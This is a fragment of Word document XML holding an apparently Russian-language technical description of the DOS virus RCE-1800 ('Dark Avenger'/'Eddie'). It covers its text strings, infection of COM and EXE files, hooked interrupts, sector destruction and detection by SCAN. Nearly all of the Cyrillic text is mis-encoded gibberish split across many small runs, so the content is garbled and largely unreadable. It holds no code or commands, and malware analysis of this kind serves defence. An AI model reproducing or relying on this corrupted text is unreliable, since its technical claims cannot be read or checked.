        <w:t>Avenger ���� ����� �� �������� ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯 ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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饥 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砥� ��� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>: RCE-1800 (Dark Avenger) � RCE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ntchev). �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।������⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쭮 ��� ����� ������᪮� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧࠡ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1. ����� RCE-1800 (Dark Avenger - ���� ���⥫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die        -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RCE-1800 ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稫 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮� �������� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>裡 � ⥬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� � ⥫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ᮤ�ঠ��� ��� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>筮 ������ ⥪�⮢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"Eddie lives...somewhere in time" (� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �.�.  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>OM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩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"This  program was written in the city of Sofia (C) 1988-89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g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RCE-1800  ����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������ ����ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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䠩�� ⨯� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠪ � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE.  �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠢ����� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᬮ�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묨 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>묨 ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᠬ� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">RCE-1800 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ��������� ��ࠧ�� ����॥</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ந�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室�� ��� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥ �ணࠬ� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  ⠪ � �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>२���������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, ����⨨ � �����⨨ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>21-4Bh, 2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Ch,  21-5Bh,  21-56h,  21-3Dh, 21-2h). ��᫥���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠪� ��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�⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��᪮���  �᫨  � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� ��⥬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��⥬���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᪨ ��ᬠ�ਢ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� �� ��� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">OM � EXE </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩��� �㤥� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१���� ��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᪥  ��ࠦ�����  �ணࠬ��  ����� � ����� ��।� ��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 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">COMMAND.COM ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ���  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>27107  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᫨  ���  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࢮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">砫��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ��� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>25307 ���⮢).  �� �⮬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>, ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ����� �������� ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>易�� � ⥬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樨 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠥ� ���� ����� ���������� ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  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>뢠���� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᪠ � ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祣� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室�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ࠡ��ᯮᮡ�� �� �� ���ᨨ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS DOS. �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢�ઠ ����� ���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⥫� ����� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">墠�뢠�� ���뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>13h, 21h, 27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ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� 㢥��稢����� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ��� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1800 ���⮢, ��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ᮧ����� � ��ਡ��� ������� ��������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>묨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ��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⭮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ��  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����  �����  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᢮� ⥫� � ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 � ���� �� ���� ������� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室� �� ��砫� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">࠭��� ��ࠣ�� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� �� �믮������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.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-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ������ �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1775 (6Fh) �� 63148(F6ACh)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ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� �믮������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭���⭮,  �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭��� 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 ��  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭�� � ᢮�� ⥫� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室��� ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ�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⠭������� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�� �� �� ��������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��᪮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⥫� ������� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� 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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ�������� �� �࠭��� ��ࠣ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>( �.�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������� � ��������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1800..1815 ����). ���������� EXE-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��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1775 (6Fh)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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樨 ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稥 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮�� 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(�� �⮬ ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢������ ���������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㤭�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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樭�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>) �,  �᫨ �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��⥬ �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">権 � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MCB �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樨 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS DOS (�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뤥�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮�������� � ��������� ࠧ��஢ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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) ��⠥��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������ � �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠧� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樨 ���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ᯮ������� � ��� ��ࠡ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稪� ���뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>13h ��� ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,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⪮�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">室��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᢥ����� ��� �⮩ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>楫� 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஢ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>40h � 41h,  ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">室���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⢥��⢥���, ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�ঠ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,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, ���� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稪� ���뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>13h � ��� � ���� ⠡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  ��� �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।������ ��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>13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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㥬� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮬ �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭨���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠫ�� � �� ࠡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠥� �� ��� ��� ⨯�� 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�⨬�� ����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뢠��  ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⢮  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮��  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">権 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(����᪮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� �ணࠬ�� ��᫥ ��१���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㧪� ��⥬�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室� �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१������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">)  � ���� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᬥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">饭��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>0�h (10) ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥪ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �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ᥪ�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">믮������ � ������� ���뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>25h, �� �������� ⮫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쪮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  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ন���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饩 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᪨ ࠧ��஬ ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>32M.  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ� ��᫥ ��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⠫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">﨨 ����� ���������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2 ���� (8-� � 10-�) BOOT-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥪ��  ��᪠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ண� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뫠 ����饭� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� �ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">.  ��⥬ ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㢥��稢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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祭�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>10-�� ���� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">࠭�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㢥��祭��� ���祭�� � ⮬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-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᥪ��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稪  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>権</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).  ��  ������  16-�� ���⠫��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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㭨�⮦��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮤ�ন��� ������ �� ᥪ�஢ ������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(�����,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롨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠥ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">砩�� � ������ �� ���祭�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>8-�� ���� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥪ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>)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㤠 ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">512 ���⮢ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮��� ⥫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �� �⮬ ���� ����� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 xml:space="preserve">ᥪ��    ����   ᮤ�ঠ��   </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪠������   ���   �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ�   </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"Ed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es...somewhere in time" �� ����� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㭨�⮦���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥪ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�� � ������� ���⥪�⭮�� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠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 xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩��� ��� 㭨�⮦���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥪ�஢ ����� �ᯮ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뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>13 "�������" - �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ����� ��।����� � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ����� ⥪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騩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稪 ���뢠���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �� �������� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஢�ન १������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䨫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㦥 㪠�뢠����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �⫨�⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮡ�������� ����� ���� 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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稪 ���뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>21h ������ �⠭���⭮� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㭪樨  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>4Bh  (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㧪� ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ������ �ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>) ��᫥������ ⠪�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭪樨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��� ����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⨥ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��������� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ਡ�⮢ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� � �������  ��㣨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 ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>蠥� �����㥬���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ� ����� ����ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. 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h ����� �������� ��� ⮣�,  �⮡� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� 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h, � �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室����� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠫ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祢 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>[13].  �᫨ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室���  ��  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ப�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  � RCE-1800 ����� ������᪮� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>宦����� � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠭ �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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쭮 ������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(1989 �.?).  � ����� �����  �����  �  �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ਮ��⥭�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>묨  �  ������  �� ��᪮�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᪨� ������⨢�� � ᥭ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1989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 ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뤥��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.�.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ଠ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⥪�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SCAN  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠�� ����� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"Dark Avenger virus [Dav]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� �������</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ﬨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Eddie - ����,  Diana (�����). ��᫥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易�� � ⥬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, �� � ⥫� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮤ�ন��� ��ப� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"Diana 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ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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饥 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">६� ������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>楫� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ���� �।�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⮣� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(�. ⠡�.4). ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� �ணࠬ� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮�� ���⥪�⭮��  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠  ��  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稢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 xml:space="preserve">,  PCTools.  ��� ����⢨� �� ������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�ন���� ��᪠ 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 ⮫쪮 �� �᫮��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।���⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮� ����㧪� ����樮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� � �</w:t>
